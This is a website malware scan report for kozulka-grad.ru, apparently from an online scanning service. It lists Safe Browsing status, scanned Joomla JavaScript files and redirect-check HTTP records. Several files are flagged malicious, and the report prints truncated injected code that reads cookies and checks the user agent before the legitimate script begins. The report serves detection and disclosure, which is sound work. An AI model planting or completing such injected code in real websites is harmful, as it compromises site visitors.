Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kozulka-grad.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kozulka-grad.ru/ | 200 OK Content-Length: 80435 Content-Type: text/html | clean |
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js | 200 OK Content-Length: 20 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jqueryui/js/jquery-ui-1.8.20.custom.min.js | 200 OK Content-Length: 206731 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 97340 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})(); Antivirus reports:
| ||
http://kozulka-grad.ru/media/system/js/core.js | 200 OK Content-Length: 5762 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo function tableOrdering(a,b,c){var d=document.adminForm;d.filter_order.value=a;d.filter_order_Dir.value=b;submitform(c)}function saveorder(a,b){checkAll_button(a,b)}function checkAll_button(a,b){b||(b="saveorder");for(var c=0;c<=a;c++){var d=document.adminForm["cb"+c];if(d){if(!1==d.checked)d.checked=!0}else{alert("You cannot change the order of items, as an item in the list is `Checked Out`");return}}submitform(b)}; Antivirus reports:
| ||
http://kozulka-grad.ru/media/system/js/caption.js | 200 OK Content-Length: 1707 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}}); Antivirus reports:
| ||
http://kozulka-grad.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 239309 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/plugins/system/jcemediabox/js/jcemediabox.js?version=1111 | 200 OK Content-Length: 57516 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/templates/vt_sport/vtemtools/menus/vtem_menu.js | 200 OK Content-Length: 10563 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/components/com_kide/js/base.js | 200 OK Content-Length: 20951 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo alert(out); } } }; ajax.open('POST', kide.ajax_url+"&task=catpcha_check", true); ajax.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); ajax.send('recaptcha_challenge_field='+encodeURIComponent(kide.form('recaptcha_challenge_field'))+'&recaptcha_response_field='+encodeURIComponent(kide.form('recaptcha_response_field'))); } }; kide.events.add('onAjax_captcha_check', kide.captcha.onAjax_check); Antivirus reports:
| ||
http://kozulka-grad.ru/components/com_kide/templates/default/js/kide.js | 200 OK Content-Length: 7280 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/modules/mod_slogin/media/slogin.js | 200 OK Content-Length: 4776 Content-Type: application/x-javascript | clean |
http://kozulka-grad.ru/modules/mod_dinamods/js/dinamods.js | 200 OK Content-Length: 6021 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo this.expandtab(this.tabs[i]); persisterror=false; } } } if (persisterror) this.expandtab(this.tabs[this.hottabspositions[0]]); if (parseInt(this.automodeperiod)>500 && this.hottabspositions.length>1){ this.autoruntimer=setInterval(function(){tabinstance.autorun()}, this.automodeperiod); } } } Antivirus reports:
| ||
http://kozulka-grad.ru/modules/mod_joomleague_matches/assets/js/mod_joomleague_matches.js | 200 OK Content-Length: 5841 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kozulka-grad.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 09 Jan 2015 06:24:20 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ee98d926ecc6b0e698d1e3ca2331fd3f=5d23f64b3f32c65d62397ab1c1c0cf1c; path=/
Set-Cookie: kide_config=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: kozulka-grad.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 09 Jan 2015 06:24:20 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ee98d926ecc6b0e698d1e3ca2331fd3f=5d23f64b3f32c65d62397ab1c1c0cf1c; path=/
Set-Cookie: kide_config=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: kozulka-grad.ru
Referer: http://www.google.com/search?q=kozulka-grad.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kozulka-grad.ru
Referer: http://www.google.com/search?q=kozulka-grad.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.